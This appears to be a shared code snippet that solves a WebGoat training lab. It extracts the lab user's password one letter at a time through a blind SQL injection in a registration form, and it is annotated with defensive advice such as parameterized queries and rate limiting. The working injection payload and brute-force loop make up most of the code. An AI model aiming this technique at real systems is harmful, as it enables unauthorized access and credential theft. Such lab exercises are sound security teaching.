Created
June 24, 2022 14:10
WebGoat SQL Injection Lesson 5 Solution
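/**
 * WebGoat "SQL Injection (advanced)" lab helper: extends a known password
 * prefix for the lab user `tom` by one lowercase letter.
 *
 * Why the lab endpoint leaks data: the `username_reg` value sent below closes
 * the quoted string with `'` and appends `AND password like '<prefix>%'`
 * (`+` is a form-encoded space, `%25` is the LIKE wildcard `%`). The
 * registration check evidently places that value into its SQL text unescaped,
 * so the "already exists" feedback becomes a true/false oracle for the guess.
 *
 * Defensive takeaways for the code under test:
 *  - bind `username_reg` as a query parameter instead of concatenating it;
 *  - return the same feedback whether or not the user exists;
 *  - this loop sends up to 26 PUT requests per character, all carrying a
 *    quote and `like` in `username_reg`, which is an easy pattern to alert on
 *    in request logs and to throttle with rate limiting.
 *
 * @param {string} [password] Prefix confirmed so far; any falsy value means "".
 * @returns {Promise<string|undefined>} The prefix plus one letter, or
 *   `undefined` when no letter in a-z matched (for example the value is
 *   complete or its next character is outside a-z).
 * @throws {Error} When the JSON response carries no `feedback` string.
 */
let findNextLetter = async function(password) {
  // Falsy input (undefined, null, "") means no prefix is known yet.
  const prefix = password || "";
  const lastCode = 'z'.charCodeAt(0);

  for (let code = 'a'.charCodeAt(0); code <= lastCode; code += 1) {
    const candidate = prefix + String.fromCharCode(code);

    // Request copied from the browser's own registration call; `credentials`
    // sends the logged-in WebGoat session cookie along with it.
    const response = await fetch("http://localhost:8080/WebGoat/SqlInjectionAdvanced/challenge", {
      "headers": {
        "accept": "*/*",
        "accept-language": "en-US,en;q=0.9",
        "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
        "sec-fetch-dest": "empty",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "same-origin",
        "sec-gpc": "1",
        "x-requested-with": "XMLHttpRequest"
      },
      "referrer": "http://localhost:8080/WebGoat/start.mvc",
      "referrerPolicy": "strict-origin-when-cross-origin",
      "body": `username_reg=tom'+AND+password+like+'${candidate}%25&email_reg=hendrixjoseph%40aol.com&password_reg=pw&confirm_password_reg=pw`,
      "method": "PUT",
      "mode": "cors",
      "credentials": "include"
    });

    const json = await response.json();
    const feedback = json?.feedback;
    if (typeof feedback !== 'string') {
      // Fail with a readable message instead of a TypeError on `.includes`.
      throw new Error("Challenge response has no 'feedback' string; cannot read the result");
    }

    // The lab answers "already exists" only when the injected LIKE matched.
    // NOTE(review): LIKE may compare case-insensitively depending on the
    // database collation, so letter case is not necessarily confirmed.
    if (feedback.includes('already exists')) {
      return candidate;
    }
  }

  // No letter in a-z extended the prefix.
  return undefined;
};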
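/**
 * Recovers the lab password one character at a time by calling
 * findNextLetter() repeatedly and logging each longer prefix.
 *
 * The character-by-character recovery is possible only because the lab
 * endpoint answers differently for a matching and a non-matching guess;
 * a parameterized query plus uniform feedback removes that signal.
 *
 * @param {number} [size] Maximum number of characters to try; any falsy value
 *   (including 0) falls back to 10.
 * @param {string} [start] Prefix that is already known, if any.
 * @returns {Promise<string|undefined>} The longest prefix confirmed, or
 *   `start` unchanged when nothing matched.
 */
let findPassword = async function(size, start) {
  const maxLength = size || 10;
  let password = start;

  for (let i = 0; i < maxLength; i += 1) {
    // Use a separate name here: the original redeclared `password` with `let`
    // inside the loop, which shadowed the outer binding and threw a
    // ReferenceError (temporal dead zone) on the first iteration.
    const extended = await findNextLetter(password);

    // undefined means no letter matched; stop rather than restart from "".
    if (extended === undefined) {
      break;
    }

    password = extended;
    console.log(password);
  }

  return password;
};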